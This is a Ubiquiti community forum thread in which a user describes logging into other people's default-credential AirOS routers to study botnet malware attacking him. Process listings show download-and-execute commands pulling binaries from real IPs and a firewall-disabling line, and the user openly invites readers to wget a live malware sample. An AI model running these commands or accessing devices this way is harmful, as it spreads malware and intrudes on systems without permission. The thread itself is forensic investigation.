Attack Malware


  • W
    Custom Avatar

    I've been doing some research on Chinese attack nodes after my home server came under attack a couple of weeks ago.  Using Fail2Ban, I've collected a lot of attack node IP addresses.

    Some are from Ubiquiti Linux-based routers.

    At the moment, I'm examining an AirGrid M5 HP.  At some point, a self-deleting shell script was installed on it.  The script disables any firewalls it can find, then calls out to various Web sites for a copy of the real malware.

    Since I started looking at this router yesterday, it appears that a C compiler was attempted to be installed.  It's /var/tmp/cc1, and dated yesterday at about 01:30GMT.  It will not run:  I think the filesystem ran out of space before it was fully copied.

    There are number of telltale signs in ubnt's home directory.  There are several files that have attempted to write to the persistent filesystem, but they are zero-length because the filesystem is full.

    So my questions are:

    Does this device come with a C compiler in /var/tmp?  If so, why is it dated yesterday and give me a segfault if I attempt to run it?

    Should there be files in ubnt's home directory?  Specifically, a file called DDos (which also gives a segfault when it's run)?


  • W
    Custom Avatar

    And now another binary file has appeared in /etc/persistent.  It's called "win9" and it filled the filesystem before finally dying.

    Does this file have any valid purpose?  Or am I seeing more evidence of malware at work?


  • Ubiquiti Employee

    What firmware was on this unit, and was remote management accessible from the Internet?


  • W
    Custom Avatar

    It's firmware version XW.v5.5.6 and yes, it is open to the Internet with the default credentials still in place.

    And no, it's not mine.  I would never have done such a thing.  This is a router used to attack me.

    Technically, I shouldn't even be in it, but discerning the scale of the Chinese attack infrastructure has become something of a project.  I've found dozens of unsecured routers of various makes and models that have been infected.  This happened to be the first one I could SSH to and look at in detail.

    In any case, not being familiar with the firmware, I am unclear if the C compiler is supposed to be there in the first place.  Due to the datestamp, I suspect not, but I don't know for sure.

    I assume all the crap in ubnt's home directory is the attack malware attempting to compile binaries on the router.


  • W
    Custom Avatar

    And between posts, a process filled the persistent filesystem with the binary file /etc/persistent/DDos.  I had explicitly done a "cat /dev/null > DDos" about two hours ago to see if it would fill again.  I was hoping to catch the process that created it, but I was too late.


  • W
    Custom Avatar

    Also, is there anything (preferably large) that can be deleted from the persistent filesystem?  I'd like to free up enough space for the binaries to be created.  Then I can scp them out to a server under my control and examine them with a hex editor.


  • Ubiquiti Employee

    Ahh…  I see...  Well I don't suggest accessing someone elses devices. I would suggest contacting thier ISP with IP date/time details.   That being said, the only files that should be in /etc/persistent are the following.

    XM.v5.6.1-RC.27630.150526.1108# ls -al /etc/persistent/
    drwxr-xr-x    2 ubnt     admin         100 Jan  1  1970 .
    drwxr-xr-x   10 ubnt     admin         780 May 26 11:08 ..
    lrwxrwxrwx    1 ubnt     admin          21 Jan  1  1970 cardlist.txt -> /usr/etc                                                   /cardlist.txt
    -rw-------    1 ubnt     admin         458 Oct  1  2014 dropbear_dss_host_key
    -rw-------    1 ubnt     admin         427 Oct  1  2014 dropbear_rsa_host_key
    XM.v5.6.1-RC.27630.150526.1108#
    
    
    XM.v5.6.1-RC.27630.150526.1108# ls -al /var/tmp/
    drwxr-xr-x    3 ubnt     admin         180 May 26 11:08 .
    drwxrwxrwt    7 ubnt     admin         140 Jan  1  1970 ..
    -rw-r--r--    1 ubnt     admin         696 May 26 11:08 .sessions.tdb
    -rw-r--r--    1 ubnt     admin           6 May 26 11:08 .wifi_ath0
    -rw-r--r--    1 ubnt     admin        8196 May 26 11:08 boot.txt
    -rw-------    1 ubnt     admin        5197 Jan  1  1970 running.cfg
    drwxr-xr-x    2 ubnt     admin          60 May 26 11:11 stats
    -rw-r--r--    1 ubnt     admin        5197 Jan  1  1970 system.cfg
    -rw-r--r--    1 ubnt     admin         238 May 26 11:08 ubntconf.log
    XM.v5.6.1-RC.27630.150526.1108#
    
    

  • Ubiquiti Employee

    Ahh…  I see...  Well I don't suggest accessing someone elses devices. I would suggest contacting thier ISP with IP date/time details.   That being said, the only files that should be in /etc/persistent are the following.

    XM.v5.6.1-RC.27630.150526.1108# ls -al /etc/persistent/
    drwxr-xr-x    2 ubnt     admin         100 Jan  1  1970 .
    drwxr-xr-x   10 ubnt     admin         780 May 26 11:08 ..
    lrwxrwxrwx    1 ubnt     admin          21 Jan  1  1970 cardlist.txt -> /usr/etc                                                   /cardlist.txt
    -rw-------    1 ubnt     admin         458 Oct  1  2014 dropbear_dss_host_key
    -rw-------    1 ubnt     admin         427 Oct  1  2014 dropbear_rsa_host_key
    XM.v5.6.1-RC.27630.150526.1108#
    
    
    XM.v5.6.1-RC.27630.150526.1108# ls -al /var/tmp/
    drwxr-xr-x    3 ubnt     admin         180 May 26 11:08 .
    drwxrwxrwt    7 ubnt     admin         140 Jan  1  1970 ..
    -rw-r--r--    1 ubnt     admin         696 May 26 11:08 .sessions.tdb
    -rw-r--r--    1 ubnt     admin           6 May 26 11:08 .wifi_ath0
    -rw-r--r--    1 ubnt     admin        8196 May 26 11:08 boot.txt
    -rw-------    1 ubnt     admin        5197 Jan  1  1970 running.cfg
    drwxr-xr-x    2 ubnt     admin          60 May 26 11:11 stats
    -rw-r--r--    1 ubnt     admin        5197 Jan  1  1970 system.cfg
    -rw-r--r--    1 ubnt     admin         238 May 26 11:08 ubntconf.log
    XM.v5.6.1-RC.27630.150526.1108#
    
    

  • W
    Custom Avatar

    That's very interesting.  None of the files you mention are in /etc/persistent:

    XW.v5.5.6# ls -al
    drwxr-xr-x    2 ubnt     admin         160 Jun 26 18:28 .
    drwxr-xr-x   10 ubnt     admin         740 Sep  6  2013 ..
    -rwxrwxrwx    1 ubnt     admin           0 Jun 26 15:16 8187
    -rwxrwxrwx    1 ubnt     admin           0 Jun 26 19:35 DDos
    -rwxrwxrwx    1 ubnt     admin           0 Sep  6  2013 rfgsghs
    -rwxrwxrwx    1 ubnt     admin           0 Sep  5  2013 sff
    -rwxrwxrwx    1 ubnt     admin           0 Jun 26 06:59 sndddd
    -rwxrwxrwx    1 ubnt     admin           0 Jun 26 18:27 win9
    

    Also /var/tmp looks like this:

    XW.v5.5.6# ls -al /var/tmp/
    drwxr-xr-x    3 ubnt     admin         200 Jun 26 19:35 .
    drwxrwxrwt    7 ubnt     admin         140 Jan  1  1970 ..
    -rw-r–r--    1 ubnt     admin       24576 Sep  6  2013 .sessions.tdb
    -rw-r--r--    1 ubnt     admin           0 Jun 26 17:10 .update-info.json
    -rw-r--r--    1 ubnt     admin           6 Aug 30  2013 .wifi_ath0
    -rw-r--r--    1 ubnt     admin        6461 Aug 30  2013 boot.txt
    -rw-------    1 ubnt     admin        3792 Jan  1  1970 running.cfg
    -rw-r--r--    1 ubnt     admin        4096 Sep  6  2013 system.cfg
    -rw-r--r--    1 ubnt     admin         238 Aug 30  2013 ubntconf.log
    drwxr-xr-x    2 ubnt     admin          40 Sep  6  2013 upload
    

    The C compiler "cc1" was in /var/tmp, but I deleted it.  It hadn't finished copying because it had filled the filesystem, and I wanted to see what happened with those gibberish files.  I was rewarded when "DDos" filled the filesystem.

    As to contacting the ISP, I don't dare.  I have every reason to believe that they're complicit in infecting this device.  If they're not complicit, there's nothing they can do about it.

    Besides, this is a great box for forensics.  Most of the processes running on it are attack processes.  I've  been able to glean a great deal about what the malware does and how it works by running some simple commands on this box.

    For various reasons, I've become interested in investigating the Chinese scan-and-attack infrastructure.  This router is part of that.


  • W
    Custom Avatar

    Well, they rebooted their router, which was a grand thing from both their perspective and mine.

    On their side, it put a halt to over 90% of the attack processes running on the device.  By the time I got back into it after a couple of days, it had already downloaded a new attack binary – and the binary was still there.

    I quickly SCP-ed the attack binary (as well as a couple of others it had created but was not running) to servers under my control.  I then killed the attack processes, deleted the binaries and rebooted the router.

    This wasn't entirely because I'm a nice guy.  The device had successfully picked up new malware between the time it was rebooted and today.

    Now I want to see if -- after all traces of the malware that I know about have been removed -- it picks up the malware again.


  • W
    Custom Avatar

    Aaaaaand …

    During my last post, minutes after the router was rebooted "clean," it picked up more malware.  Amazing.


  • W
    Custom Avatar

    I used AVG's online decompiler (https://retdec.com)) and got C code.  Admittedly, it looks like hell and is going to take a long time to slog through.

    After all, the code is 262,901 lines long and containt 398 functions.

    Ok, maybe the online compiler didn't do a great job.  But still, I have code.  :)


  • W
    Custom Avatar

    Checked this morning, and the node is at it again.

    Want some fun?  Download this:

    wget -c http://117.21.191.197:2452/cdretsr

    It's currently active (I downloaded it moments ago) and will give you the ARM malware currently running on this router.

    Just for kicks, here's a process listing:

      PID USER       VSZ STAT COMMAND
        1 ubnt      1976 S    init
        2 ubnt         0 SW   [kthreadd]
        3 ubnt         0 SW   [ksoftirqd/0]
        4 ubnt         0 SW   [watchdog/0]
        5 ubnt         0 SW   [events/0]
        6 ubnt         0 SW   [khelper]
        9 ubnt         0 SW   [async/mgr]
       43 ubnt         0 SW   [sync_supers]
       45 ubnt         0 SW   [bdi-default]
       47 ubnt         0 SW   [kblockd/0]
       67 ubnt         0 SW   [khungtaskd]
       68 ubnt         0 SW   [kswapd0]
       69 ubnt         0 SW   [aio/0]
       70 ubnt         0 SW   [crypto/0]
      152 ubnt         0 SW   [mtdblockd]
      524 ubnt      1972 S    init
      679 ubnt      1964 S <  /bin/watchdog -t 1 /dev/watchdog
      791 ubnt      7208 S    /bin/infctld -m -c
      792 ubnt      1392 S    /sbin/ntpclient -n -s -c 0 -l -h time.nist.gov
      794 ubnt      2000 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
      795 ubnt      1968 S    /bin/syslogd -n -S
      796 ubnt      1500 S    /usr/bin/iwevent -s
      856 ubnt      2348 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
      919 ubnt      4660 S    ./DDos
      920 ubnt      4660 S    ./DDos
      921 ubnt      4660 S    ./DDos
     1036 ubnt      4988 S    ./win9
     1037 ubnt      4988 S    ./win9
     1038 ubnt      4988 S    ./win9
     1153 ubnt      4660 S    ./Ccc
     1154 ubnt      4660 S    ./Ccc
     1187 ubnt      4660 S    ./Ccc
     1195 ubnt      3564 S    ./Ccc
     1196 ubnt      3564 S    ./Ccc
     1217 ubnt      3564 S    ./Ccc
     1308 ubnt      2120 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     1313 ubnt      2064 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     1326 ubnt      1972 S    sh -c wget -c http://117.21.191.197:2452/cdretsr;chmod 777 cdretsr;./cdretsr;
     1329 ubnt      3564 S    ./cdretsr
     1330 ubnt      3564 S    ./cdretsr
     1331 ubnt      3564 S    ./cdretsr
     1339 ubnt      2064 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     1348 ubnt      4268 S    /bin/lighttpd -D -f /etc/lighttpd.conf
     1356 ubnt      2068 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     1357 ubnt      1976 S    -sh
     1366 ubnt      1972 R    ps w
    

    There's also a process that I observed in previous process listings that's fortunately not showing up here.  The malware had previously run commands to disable any firewall it finds.  At least we're not seeing that … yet.

    I've found another router, a peer to this one.  It shares the same make, model, and firmware revision, suffering the same issues as this one and for the same reasons:  open to the Internet for administration using the default administrator credentials.


  • W
    Custom Avatar

    Here's a fun one.  I enabled logging and am getting some really useful information.

    222.186.58.177 is a potential command-and-control node.  It logged in to the router as the admin user shortly before it the router started being an attack node.

    I cleaned everything out (again) and am watching the messages file closely.  In short order, 183.56.173.197 logged in and apparently SCP-ed a malware named "CQQ" to the router.

    I cleared the router (again) and am now actively monitoring the logfile.

    I'm going to have a list of potential command-and-control nodes if this keeps up …


  • W
    Custom Avatar

    Caught 'em in the act.  From /var/log/messages:

    Jun 30 17:22:48 dropbear[1662]: Child connection from 222.186.30.175:4494
    Jun 30 17:22:51 dropbear[1662]: Password auth succeeded for 'ubnt' from 222.186.30.175:4494
    Jun 30 17:23:34 dropbear[1662]: Exit (ubnt): Error writing
    

    Immediately after this entry I checked the system.  Apparently 22.186.30.175 SCP-ed the file "win9" into ubnt's home directory, then executed it.


  • W
    Custom Avatar

    Well, the last interesting thing about this, inasmuch as I've now gathered enough forensic data to draw conclusions:

    Even though it's been successfully compromised, when logging is enabled, /var/log/messages fills up with numerous IP addresses attempting to brute-force the password.

    I'm going to let this device alone for a while to watch everything it does – particularly if it keeps getting hammered by brute-force attempts.

    However, preliminarily, I think I can say this:

    Attack nodes attack each other.

    This would be consistent with my theory that once open ports are found, they're thrown into a database and assigned a target value.  Apparently what's not happening is that successfully-compromised devices aren't marked as being unnecessary to attack -- or at least their target value should be lowered to where it won't get hammered like this.

    As I say, I'm going to keep an eye on this.  Now that I know how the routers are compromised, I'm going to sit back and watch what happens.


  • W
    Custom Avatar

    I discovered what I've stumbled into:  the Dyre banking trojan:

    "We have seen literally hundreds of wireless access points, and routers connected in relation to this botnet, usually AirOS,” said Bryan Campbell, lead threat intelligence analyst at Fujitsu. “The consistency in which the botnet is communicating with compromised routers in relation to both distribution and communication leads us to believe known vulnerabilities are being exploited in the firmware which allows this to occur."

    That would be consistent with what I'm seeing.  By no means are all the attack nodes I've identified AirOS; however I've actively monitored five (because it's simplicity itself to log in as ubnt).

    Well, I know at least one brand to stay away from:  Ubiquiti.


  • W
    Custom Avatar

    Yep, as of this morning, the router is back to its usual tricks.

    XW.v5.5.10# ls -al /etc/persistent/
    drwxr-xr-x    3 ubnt     admin         160 Jul  1 11:56 .
    drwxr-xr-x   10 ubnt     admin         740 Jul  1 06:08 ..
    drwx–----    2 ubnt     admin          60 Jul  1 11:56 .ssh
    -rwxrwxrwx    1 ubnt     admin      273488 Jul  1 02:58 8384
    -rwxr-xr-x    1 ubnt     admin      763528 Jul  1 05:58 Ctvgn
    -rwxr-xr-x    1 ubnt     admin      763528 Jul  1 02:22 Ctvgt
    -rwxrwxrwx    1 ubnt     admin      763528 Jul  1 11:48 cdretsr
    -rwxrwxrwx    1 ubnt     admin      273488 Jul  1 01:09 i
    

    And a process listing ...

    XW.v5.5.10# ps w
      PID USER       VSZ STAT COMMAND
        1 ubnt      1976 S    init
        2 ubnt         0 SW   [kthreadd]
        3 ubnt         0 SW   [ksoftirqd/0]
        4 ubnt         0 SW   [watchdog/0]
        5 ubnt         0 SW   [events/0]
        6 ubnt         0 SW   [khelper]
        9 ubnt         0 SW   [async/mgr]
       43 ubnt         0 SW   [sync_supers]
       45 ubnt         0 SW   [bdi-default]
       47 ubnt         0 SW   [kblockd/0]
       67 ubnt         0 SW   [khungtaskd]
       68 ubnt         0 SW   [kswapd0]
       69 ubnt         0 SW   [aio/0]
       70 ubnt         0 SW   [crypto/0]
      152 ubnt         0 SW   [mtdblockd]
      524 ubnt      1972 S    init
      679 ubnt      1964 S <  /bin/watchdog -t 1 /dev/watchdog
      791 ubnt      7208 S    /bin/infctld -m -c
      792 ubnt      1392 S    /sbin/ntpclient -n -s -c 0 -l -h time.nist.gov
      794 ubnt      2000 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
      795 ubnt      1968 S    /bin/syslogd -n -S
      796 ubnt      1500 S    /usr/bin/iwevent -s
     2537 ubnt      1972 S    sh -c wget http://222.186.58.177:8025/8384;chmod 0777 8384;./8384
     2579 ubnt      4984 S    ./8384
     2580 ubnt      4984 S    ./8384
     2723 ubnt     25400 S    ./win9
     2724 ubnt     25400 S    ./win9
     2725 ubnt     25400 S    ./win9
     2737 ubnt     25400 S    ./win9
     2738 ubnt     25400 S    ./win9
     2739 ubnt     25400 S    ./win9
     2740 ubnt     25400 S    ./win9
     2741 ubnt     25400 S    ./win9
     2742 ubnt     25400 S    ./win9
     2743 ubnt     25400 S    ./win9
     2744 ubnt     25400 S    ./win9
     2745 ubnt     25400 S    ./win9
     2746 ubnt     25400 S    ./win9
     2754 ubnt      1972 S    sh -c wget http://222.186.58.177:8025/8384;chmod 0777 8384;./8384
     2757 ubnt      4920 S    ./8384
     2758 ubnt      4920 S    ./8384
     2775 ubnt      2068 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     2914 ubnt      1976 S    sh -c rm -f *;wget -c http://210.51.13.120:65530/i;chmod 777 i;./i
     2918 ubnt     94836 S    ./i
     2919 ubnt     94836 S    ./i
     2920 ubnt     94836 S    ./i
     2922 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2926 ubnt      3564 S    ./8384
     2927 ubnt      3564 S    ./8384
     2929 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2932 ubnt      3564 S    ./8384
     2933 ubnt      3564 S    ./8384
     2936 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2939 ubnt      3564 S    ./8384
     2940 ubnt      3564 S    ./8384
     2943 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2946 ubnt      3564 S    ./8384
     2947 ubnt      3564 S    ./8384
     2951 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2954 ubnt      3564 S    ./8384
     2955 ubnt      3564 S    ./8384
     2991 ubnt      1976 S    sh -c rm -f *;wget -c http://210.51.13.120:65530/i;chmod 777 i;./i
     2995 ubnt      3564 S    ./i
     2996 ubnt      3564 S    ./i
     2997 ubnt      3564 S    ./i
     3082 ubnt     94836 S    ./i
     3083 ubnt     94836 S    ./i
     3084 ubnt     94836 S    ./i
     3085 ubnt     94836 S    ./i
     3086 ubnt     94836 S    ./i
     3087 ubnt     94836 S    ./i
     3088 ubnt     94836 S    ./i
     3089 ubnt     94836 S    ./i
     3090 ubnt     94836 S    ./i
     3091 ubnt     94836 S    ./i
     3092 ubnt     94836 S    ./i
     3094 ubnt     94836 S    ./i
     3095 ubnt     94836 S    ./i
     3096 ubnt     94836 S    ./i
     3099 ubnt     94836 S    ./i
     3100 ubnt     94836 S    ./i
     3101 ubnt     94836 S    ./i
     3102 ubnt     94836 S    ./i
     3103 ubnt     94836 S    ./i
     3104 ubnt     94836 S    ./i
     3105 ubnt     94836 S    ./i
     3106 ubnt     94836 S    ./i
     3107 ubnt     94836 S    ./i
     3108 ubnt     94836 S    ./i
     3109 ubnt     94836 S    ./i
     3110 ubnt     94836 S    ./i
     3111 ubnt     94836 S    ./i
     3112 ubnt     94836 S    ./i
     3113 ubnt     94836 S    ./i
     3124 ubnt     94836 S    ./i
     3125 ubnt     94836 S    ./i
     3126 ubnt     94836 S    ./i
     3127 ubnt     94836 S    ./i
     3128 ubnt     94836 S    ./i
     3129 ubnt     94836 S    ./i
     3130 ubnt     94836 S    ./i
     3131 ubnt     94836 S    ./i
     3132 ubnt     94836 S    ./i
     3133 ubnt     94836 S    ./i
     3134 ubnt     94836 S    ./i
     3135 ubnt     94836 S    ./i
     3136 ubnt     94836 S    ./i
     3137 ubnt     94836 S    ./i
     3138 ubnt     94836 S    ./i
     3188 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     3191 ubnt      3564 S    ./8384
     3192 ubnt      3564 S    ./8384
     3204 ubnt      1716 S    ./Ctvgt
     3205 ubnt      1716 S    ./Ctvgt
     3382 ubnt      1772 S    ./Ctvgt
     3383 ubnt      1772 S    ./Ctvgt
     3838 ubnt      1772 S    ./Ctvgn
     3839 ubnt      1772 S    ./Ctvgn
     8099 ubnt      2164 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    10781 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10785 ubnt      3564 S    ./8384
    10786 ubnt      3564 S    ./8384
    10818 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10821 ubnt      3564 S    ./8384
    10822 ubnt      3564 S    ./8384
    10829 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10831 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10835 ubnt      3564 S    ./8384
    10836 ubnt      3564 S    ./8384
    10840 ubnt      3564 S    ./8384
    10841 ubnt      3564 S    ./8384
    10863 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10866 ubnt      3564 S    ./8384
    10867 ubnt      3564 S    ./8384
    11259 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11263 ubnt      3564 S    ./8384
    11264 ubnt      3564 S    ./8384
    11269 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11272 ubnt      3564 S    ./8384
    11273 ubnt      3564 S    ./8384
    11279 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11282 ubnt      3564 S    ./8384
    11283 ubnt      3564 S    ./8384
    11288 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11291 ubnt      3564 S    ./8384
    11293 ubnt      3564 S    ./8384
    11298 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11302 ubnt      3564 S    ./8384
    11303 ubnt      3564 S    ./8384
    11356 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11360 ubnt      3564 S    ./8384
    11361 ubnt      3564 S    ./8384
    11391 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11394 ubnt      3564 S    ./8384
    11395 ubnt      3564 S    ./8384
    11614 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11617 ubnt      3564 S    ./8384
    11618 ubnt      3564 S    ./8384
    11760 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11763 ubnt      3564 S    ./8384
    11764 ubnt      3564 S    ./8384
    12142 ubnt      1972 S    sh -c /etc/init.d/iptables stop;service iptables stop;Swget http://222.186.58.177:8026/8384;chmod 0777 838
    12145 ubnt      3564 S    ./8384
    12146 ubnt      3564 S    ./8384
    12256 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12260 ubnt      3564 S    ./8384
    12261 ubnt      3564 S    ./8384
    12335 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12339 ubnt      3564 S    ./8384
    12340 ubnt      3564 S    ./8384
    12374 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12378 ubnt      3564 S    ./8384
    12379 ubnt      3564 S    ./8384
    12488 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12491 ubnt      3564 S    ./8384
    12492 ubnt      3564 S    ./8384
    12501 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12504 ubnt      3564 S    ./8384
    12505 ubnt      3564 S    ./8384
    12569 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12572 ubnt      3564 S    ./8384
    12573 ubnt      3564 S    ./8384
    12739 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12744 ubnt      3564 S    ./8384
    12745 ubnt      3564 S    ./8384
    12813 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12817 ubnt      3564 S    ./8384
    12818 ubnt      3564 S    ./8384
    12917 ubnt      4268 S    /bin/lighttpd -D -f /etc/lighttpd.conf
    12934 ubnt      2064 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    13115 ubnt      4984 S    ./8384
    13116 ubnt      3564 S    ./8384
    13117 ubnt      3564 S    ./8384
    13118 ubnt      3564 S    ./8384
    13119 ubnt      3564 S    ./8384
    13120 ubnt      3564 S    ./8384
    13121 ubnt      3564 S    ./8384
    13122 ubnt      4920 S    ./8384
    13123 ubnt      3564 S    ./8384
    13124 ubnt      3564 S    ./8384
    13125 ubnt      3564 S    ./8384
    13126 ubnt      3564 S    ./8384
    13127 ubnt      3564 S    ./8384
    13128 ubnt      3564 S    ./8384
    13129 ubnt      3564 S    ./8384
    13130 ubnt      3564 S    ./8384
    13131 ubnt      3564 S    ./8384
    13132 ubnt      3564 S    ./8384
    13133 ubnt      3564 S    ./8384
    13134 ubnt      3564 S    ./8384
    13135 ubnt      3564 S    ./8384
    13136 ubnt      3564 S    ./8384
    13137 ubnt      3564 S    ./8384
    13138 ubnt      3564 S    ./8384
    13139 ubnt      3564 S    ./8384
    13140 ubnt      3564 S    ./8384
    13141 ubnt      3564 S    ./8384
    13142 ubnt      3564 S    ./8384
    13143 ubnt      3564 S    ./8384
    13144 ubnt      3564 S    ./8384
    13202 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    13205 ubnt      3564 S    ./8384
    13206 ubnt      3564 S    ./8384
    13207 ubnt      3564 S    ./8384
    13452 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    13456 ubnt      3564 S    ./8384
    13457 ubnt      3564 S    ./8384
    13458 ubnt      3564 S    ./8384
    14266 ubnt      1972 S    sh -c wget http://222.186.58.177:8027/8384;chmod 0777 8384;./8384
    14269 ubnt      3564 S    ./8384
    14270 ubnt      3564 S    ./8384
    14271 ubnt      3564 S    ./8384
    14383 ubnt      1972 S    sh -c wget http://222.186.58.177:8027/8384;chmod 0777 8384;./8384
    14386 ubnt      3564 S    ./8384
    14387 ubnt      3564 S    ./8384
    14388 ubnt      3564 S    ./8384
    14409 ubnt      1972 S    sh -c wget http://222.186.58.177:8027/8384;chmod 0777 8384;./8384
    14412 ubnt      3564 S    ./8384
    14413 ubnt      3564 S    ./8384
    14414 ubnt      3564 S    ./8384
    14884 ubnt      1972 S    sh -c wget -c http://117.21.191.197:2452/cdretsr;chmod 777 cdretsr;./cdretsr;
    14910 ubnt      3564 S    ./cdretsr
    14911 ubnt      3564 S    ./cdretsr
    14912 ubnt      3564 S    ./cdretsr
    15160 ubnt      2068 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    15166 ubnt      1984 S    -sh
    15223 ubnt      2044 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    15227 ubnt      3564 S    ./8384
    15246 ubnt      2044 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    15350 ubnt      2068 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    15355 ubnt      1976 S    -sh
    15358 ubnt      1972 R    ps w
    

    Finally, snapshot of 'top':

    Mem: 58492K used, 3632K free, 0K shrd, 764K buff, 6588K cached
    CPU:   0% usr   2% sys   0% nice  92% idle   0% io   0% irq   4% softirq
    Load average: 0.03 0.06 0.01
      PID  PPID USER     STAT   VSZ %MEM %CPU COMMAND
    15472 15355 ubnt     R     1992   3%   1% top
     2746  2724 ubnt     S    25400  41%   0% ./win9
     2742  2724 ubnt     S    25400  41%   0% ./win9
     2739  2724 ubnt     S    25400  41%   0% ./win9
     2744  2724 ubnt     S    25400  41%   0% ./win9
     2745  2724 ubnt     S    25400  41%   0% ./win9
     2738  2724 ubnt     S    25400  41%   0% ./win9
     2743  2724 ubnt     S    25400  41%   0% ./win9
     2737  2724 ubnt     S    25400  41%   0% ./win9
     3128  2919 ubnt     S    94836 152%   0% ./i
     3112  2919 ubnt     S    94836 152%   0% ./i
     3103  2919 ubnt     S    94836 152%   0% ./i
     3106  2919 ubnt     S    94836 152%   0% ./i
     3102  2919 ubnt     S    94836 152%   0% ./i
     3087  2919 ubnt     S    94836 152%   0% ./i
     3129  2919 ubnt     S    94836 152%   0% ./i
     3137  2919 ubnt     S    94836 152%   0% ./i
     3104  2919 ubnt     S    94836 152%   0% ./i
     3113  2919 ubnt     S    94836 152%   0% ./i
     3135  2919 ubnt     S    94836 152%   0% ./i
    

    As you can see, the router is now completely compromised.  The overwhelming majority of its processes are devoted to attacks.


  • W
    Custom Avatar

    Just to put a little period on this, as I don't expect to post much more here:

    There are reportedly over 44,000 devices are infected in this manner.  I've now been in contact with law enforcement.  At their suggestion, I've volunteered to create a honeypot on a DMZ of my home network by which to investigate and study this malware.  To that end, I've ordered an older, explicitly-vulnerable, Ubiquiti router for my home use.

    This is going to be fun.  :D


  • Super Users

    You do realize that any device whose credentials are left at factory defaults and is put out on the internet is vulnerable, and not the fault of the manufacturer?   I could put a $100K Cisco router out there and it would get hacked too in that condition…

    Can't realistically blame Ubiquiti for this.

    Jim


Posts 22Views 4
Log in to reply

Looks like your connection to Ubiquiti Networks Community was lost, please wait while we try to reconnect.